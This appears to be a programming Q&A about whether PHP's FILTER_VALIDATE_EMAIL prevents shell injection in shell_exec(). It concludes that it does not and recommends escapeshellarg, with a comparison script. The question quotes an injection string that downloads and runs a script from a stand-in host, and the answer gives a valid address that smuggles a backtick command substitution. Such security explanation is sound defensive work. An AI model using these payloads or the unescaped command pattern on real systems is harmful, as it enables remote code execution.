Is FILTER_VALIDATE_EMAIL sufficient to stop shell injection?


Question

So I'm planning on using shell_exec() to handle running a php script that sends an email.

It's all working great, but I was just slightly concerned about the security implications of only using FILTER_VALIDATE_EMAIL to ensure injection can't occur.

So, for example, I will be using something similar to this:

$email = $_POST['email'];
if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
    echo 'Nope ...';
} else {
    // The redirection and '&' must be part of the command string passed to the shell
    shell_exec("/usr/bin/php /var/www/mysite/includes/sendemail '" . $email . "' > /dev/null 2>/dev/null &");
}

So, obviously without the validation, I could submit my email as something like:

'; wget -O ./evil.sh http://evilsite.com/evilscript; ./evil.sh; '

and all hell could break loose ...

Is this 100% injection proof (that we know of) or is there something else I should add?

Accepted answer

The FILTER_VALIDATE_EMAIL implementation is based on Michael Rushton's Email Address Validation, which validates the input using RFC 5321, i.e., the Mailbox production rule.

Those email addresses are more extensive than those that are used in practice. For example, RFC 5321 allows quoted strings in the Local-part like "…"@example.com.

This allows injecting arbitrary commands, for example:

"'`whoami`'"@example.com

This would end up in your shell command as:

/usr/bin/php /var/www/mysite/includes/sendemail '"'`whoami`'"@example.com' > /dev/null 2>/dev/null &

The resulting sendmail parameter value would be the result of whoami quoted, like "markus"@example.com.

You see that FILTER_VALIDATE_EMAIL is simply not suited for validating shell arguments, as it was not meant to be.

Use functions that are meant for escaping shell arguments instead, like escapeshellarg for escaping single arguments or escapeshellcmd for arbitrary arguments.

Generally, you should avoid shell commands if you can achieve the same with built-in PHP features, because even escapeshellarg is not free of bugs.
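The following is an added example, not code from the question or the answer above: it checks that the quoted-local-part address from the answer passes FILTER_VALIDATE_EMAIL, then builds the command both the way the question does and with escapeshellarg so the two strings can be compared. The script path is the one from the question; the helper name buildSendCommand is this example's own.

```php
<?php
// Added example: FILTER_VALIDATE_EMAIL versus escapeshellarg() when an address
// is interpolated into a shell command. Path taken from the question.
const SENDEMAIL = '/usr/bin/php /var/www/mysite/includes/sendemail';
const REDIRECT  = ' > /dev/null 2>/dev/null &';

// Address from the answer: a valid RFC 5321 Mailbox whose quoted local part
// carries single quotes and backticks. PHP single-quoted string, so \' is '.
$address = '"\'`whoami`\'"@example.com';

// The filter answers "is this an email address?", not "is this shell-safe?".
$accepted = filter_var($address, FILTER_VALIDATE_EMAIL) !== false;

// Command built as in the question: the address's own single quotes close the
// quoted argument, so the backticks reach the shell as a command substitution.
function buildUnsafeCommand(string $email): string
{
    return SENDEMAIL . " '" . $email . "'" . REDIRECT;
}

// Hardened variant: validate first, then let escapeshellarg() wrap the value in
// single quotes and rewrite every embedded ' as '\'' so it cannot break out.
function buildSendCommand(string $email): ?string
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null; // not an address at all; caller reports the error
    }
    return SENDEMAIL . ' ' . escapeshellarg($email) . REDIRECT;
}

echo 'filter_var accepts the address: ', $accepted ? 'yes' : 'no', "\n";
echo 'unchecked:   ', buildUnsafeCommand($address), "\n";
echo 'escaped:     ', buildSendCommand($address), "\n";
```

In the escaped command the whole address sits inside one single-quoted argument, so the backticks are literal characters handed to the sendemail script rather than something the shell evaluates.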
